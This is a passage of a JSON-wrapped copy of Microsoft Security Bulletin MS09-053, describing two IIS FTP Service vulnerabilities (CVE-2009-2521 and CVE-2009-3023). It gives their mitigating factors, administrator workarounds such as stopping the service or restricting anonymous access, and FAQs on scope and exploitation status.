situation:\r\n\u2022\t\r\n\r\nFTP Service is not installed by default on all supported editions of Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2003 Windows Server 2008 and Windows 7.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for IIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the FTP service\r\n\r\nDisable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet stop msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Stop.\r\n\r\nImpact of workaround. You will not be able to transfer files using the FTP service.\r\n\r\nHow to undo the workaround.\r\n\r\nRe-enable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet start msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Start.\r\n\u2022\t\r\n\r\nDeny FTP write access to anonymous users\r\n\r\nThis workaround blocks denial of service attacks from anonymous users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to cause a remote code execution with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is deselected.\r\n\r\nImpact of workaround: Anonymous users will not have the ability to publish content on the server using the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is selected.\r\n\u2022\t\r\n\r\nDeny FTP access to anonymous users\r\n\r\nThis workaround blocks denial of service attacks from unauthenticated users without a valid user account.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to exploit the vulnerability with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is deselected.\r\n\r\nImpact of Workaround: Anonymous users will not have access to the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is selected.\r\n\u2022\t\r\n\r\nModify NTFS file system permissions to disallow directory creation by FTP users\r\n\r\nThis workaround blocks denial of service attacks from authenticated users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAn administrator can modify NTFS file system permissions on the root directories of FTP sites hosted on a server to disallow creation of directories by FTP users. This modification still allows FTP users to upload files to existing directories. Authenticated and unauthenticated users will not be able to cause a remote code execution with this workaround.\r\n\r\nAs administrator, perform the following steps to remove directory creation privileges from the Users group. If you have a configured FTP user or custom group to manage your FTP users, replace the Users group in Step 5 below with these custom identities.\r\n\r\n1.\r\n\t\r\n\r\nBrowse to the root directory of your FTP site. By default this is in &#37;systemroot&#37;&#92;inetpub&#92;ftproot.\r\n\r\n2.\r\n\t\r\n\r\nRight-click the directory and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Security tab and click Advanced.\r\n\r\n4.\r\n\t\r\n\r\nClick Change Permissions.\r\n\r\n5.\r\n\t\r\n\r\nSelect the Users group and click Edit.\r\n\r\n6.\r\n\t\r\n\r\nDeselect Create Folders/Append Data.\r\n\r\nImpact of Workaround: FTP users will not be able to create directories through the FTP Service. FTP users will still be able to upload files to existing directories through the FTP Service.\r\n\u2022\t\r\n\r\nUpgrade to FTP Service 7.5\r\n\r\nFTP Service 7.5 is available for Internet Information Services 7.0. This version of FTP Service is not affected by the vulnerabilities described in this bulletin. See the following sites on Download Center:\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 &#40;x86&#41;\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 &#40;x64&#41;\r\n\r\nImpact of workaround: FTP sites will need to be migrated from FTP Service 6.0 to FTP Service 7.5.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for IIS FTP Service DoS Vulnerability - CVE-2009-2521\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected service to stop responding and automatically restart. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that the Microsoft FTP service in IIS handles list commands.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could a user\u2019s system to become non-responsive and restart.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could exploit this vulnerability by sending specially crafted list commands to the server.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nServer systems running Microsoft File Transfer Protocol Service &#40;FTP&#41;.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that the Microsoft FTP server handles list command operations.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2009-2521.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nYes. Microsoft is aware of limited, targeted attacks attempting to exploit the vulnerability.\r\n\r\nDoes applying this security update help protect customers from the code, published publicly, that attempts to exploit this vulnerability? \r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2009-2521.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nIIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nA Vulnerability exists in the FTP Service in Microsoft Internet Information Services &#40;IIS&#41; 5.0, Microsoft Internet Information Services &#40;IIS&#41; 5.1, and Microsoft Internet Information Services &#40;IIS&#41; 6.0. The vulnerability could allow remote code execution &#40;RCE&#41; on systems running FTP Service on IIS 5.0, or denial of service &#40;DoS&#41; on systems running FTP Service on IIS 5.1, IIS 6.0.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2009-3023.\r\n\t\r\nMitigating Factors for IIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFTP Service is not installed by default on all supported editions of Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2003, Windows Server 2008 and Windows 7.\r\n\u2022\t\r\n\r\nInternet Information Services 5.1 on Window XP and Internet Information Services 6.0 on Windows Server 2003 are at reduced risk because these versions were compiled using the /GS compiler option. This does not remove the vulnerability but does make exploitation of the vulnerability more difficult and reduces the impact to a denial of service.\r\n\u2022\t\r\n\r\nInternet Information Services 7.0 is not affected by this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for IIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable the FTP service\r\n\r\nDisable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet stop msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Stop.\r\n\r\nImpact of workaround. You will not be able to transfer files using the FTP service.\r\n\r\nHow to undo the workaround.\r\n\r\nRe-enable the FTP service using one of the following procedures:\r\n\u2022\t\r\n\r\nFrom the command prompt, enter the following command:\r\n\r\nnet start msftpsvc\r\n\u2022\t\r\n\r\nIn the Internet Information Services panel, perform the following steps:\r\n\r\n1. Expand your server and right click on the FTP site.\r\n2. Click Start.\r\n\u2022\t\r\n\r\nDeny FTP write access to anonymous users\r\n\r\nThis workaround blocks remote code execution attacks from anonymous users. With this workaround, all affected versions of IIS are still vulnerable to denial of service attacks from anonymous users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to cause a remote code execution with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is deselected.\r\n\r\nImpact of workaround: Anonymous users will not have the ability to publish content on the server using the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight-click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Home Directory tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Write is selected.\r\n\u2022\t\r\n\r\nDeny FTP access to anonymous users\r\n\r\nThis workaround blocks denial of service attacks from unauthenticated users without a valid user account.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAnonymous users are not granted FTP write access by default. If anonymous write access has been granted on an FTP server, the administrator can modify IIS permissions to prevent anonymous write access. Anonymous users will not be able to exploit the vulnerability with this workaround.\r\n\r\nTo modify IIS permissions to prevent FTP write access to anonymous users, perform the following steps:\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is deselected.\r\n\r\nImpact of Workaround: Anonymous users will not have access to the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nLaunch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nRight click Default FTP Site and point to Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the SecurityAccounts tab.\r\n\r\n4.\r\n\t\r\n\r\nEnsure that Allow anonymous connections is selected.\r\n\u2022\t\r\n\r\nModify NTFS file system permissions to disallow directory creation by FTP users\r\n\r\nThis workaround blocks remote code execution attacks from authenticated users. With this workaround, all affected versions of IIS server are still vulnerable to denial of service attacks from authenticated users.\r\n\r\nThis workaround blocks known exploits and minimizes the impact of any variations of this attack vector. However, this workaround does not render the vulnerability completely inaccessible to exploitation.\r\n\r\nAn administrator can modify NTFS file system permissions on the root directories of FTP sites hosted on a server to disallow creation of directories by FTP users. This modification still allows FTP users to upload files to existing directories. Authenticated and unauthenticated users will not be able to cause a remote code execution with this workaround.\r\n\r\nAs administrator, perform the following steps to remove directory creation privileges from the Users group. If you have a configured FTP user or custom group to manage your FTP users, replace the Users group in Step 5 below with these custom identities.\r\n\r\n1.\r\n\t\r\n\r\nBrowse to the root directory of your FTP site. By default this is in &#37;systemroot&#37;&#92;inetpub&#92;ftproot.\r\n\r\n2.\r\n\t\r\n\r\nRight-click the directory and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Security tab and click Advanced.\r\n\r\n4.\r\n\t\r\n\r\nClick Change Permissions.\r\n\r\n5.\r\n\t\r\n\r\nSelect the Users group and click Edit.\r\n\r\n6.\r\n\t\r\n\r\nDeselect Create Folders/Append Data.\r\n\r\nImpact of Workaround: FTP users will not be able to create directories through the FTP Service. FTP users will still be able to upload files to existing directories through the FTP Service.\r\n\r\nHow to undo the workaround.\r\n\r\n1.\r\n\t\r\n\r\nBrowse to the root directory of your FTP site. By default this is in &#37;systemroot&#37;&#92;inetpub&#92;ftproot.\r\n\r\n2.\r\n\t\r\n\r\nRight-click the directory and select Properties.\r\n\r\n3.\r\n\t\r\n\r\nClick the Security tab and click Advanced.\r\n\r\n4.\r\n\t\r\n\r\nClick Change Permissions.\r\n\r\n5.\r\n\t\r\n\r\nSelect the Users group and click Edit.\r\n\r\n6.\r\n\t\r\n\r\nSelect Create Folders/Append Data.\r\n\u2022\t\r\n\r\nUpgrade to FTP Service 7.5\r\n\r\nFTP Service 7.5 is available for Internet Information Services 7.0. This version of FTP Service is not affected by the vulnerabilities described in this bulletin. See the following sites on Download Center:\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 &#40;x86&#41;\r\n\u2022\t\r\n\r\nMicrosoft FTP Service 7.5 for IIS 7.0 &#40;x64&#41;\r\n\r\nImpact of workaround: FTP sites will need to be migrated from FTP Service 6.0 to FTP Service 7.5.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for IIS FTP Service RCE and DoS Vulnerability - CVE-2009-3023\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected service to stop responding and automatically restart. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nThis is a remote code execution vulnerability on systems running Microsoft Windows 2000 Service Pack 4 and a denial of service vulnerability on all of the other affected platforms. An attacker who successfully exploited this vulnerability in IIS 5.0 on Microsoft Windows 2000 Service Pack 4 could cause remote code execution in the context of LocalSystem. An attacker who successfully exploited this vulnerability on IIS 5.1 and IIS 6.0 could cause the IIS FTP service to stop and become unresponsive.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that the Microsoft FTP service in IIS handles list commands.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker with access to the FTP Service could use this vulnerability to cause a stack-based overrun that could allow execution of arbitrary code in the context of the LocalSystem account on systems running IIS 5.0, or denial of service on affected systems running IIS 5.1 or IIS 6.0. In configurations of FTP Service where anonymous authentication is allowed, the attacker need not be authenticated for exploitation to occur. For more information on the LocalSystem account, see the MSDN article, LocalSystem Account.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn anonymous or authenticated user with access to the FTP service could send FTP NLST commands causing memory corruption and remote code execution on systems running IIS 5.0 on Microsoft Windows 2000 and denial of service on systems running IIS 5.1 or IIS 6.0 on other platforms.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nServer systems running Microsoft File Transfer Protocol Service &#40;FTP&#41;.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that the Microsoft FTP server handles list command operations.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2009-3023.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nYes. Microsoft is aware of limited, targeted attacks attempting to exploit the vulnerability.\r\n\r\nDoes applying this security update help protect customers from the code, published publicly, that attempts to exploit this vulnerability? \r\nYes. This security update addresses the vulnerability that is currently being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2009-3023.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nKingcope for reporting the IIS FTP Service DoS Vulnerability &#40;CVE-2009-2521&#41;\r\n\u2022\t\r\n\r\nKingcope for reporting the IIS FTP Service RCE and DoS Vulnerability &#40;CVE-2009-3023&#41;\r\n\r\nMicrosoft Active Protections Program &#40;MAPP&#41;\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program &#40;MAPP&#41; Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 &#40;October 13, 2009&#41;: Bulletin published.", "modified": "2009-10-13T00:00:00", "published": "2009-10-13T00:00:00", "id": "SECURITYVULNS:DOC:22610", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22610", "title": "Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution &#40;975254&#41;", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}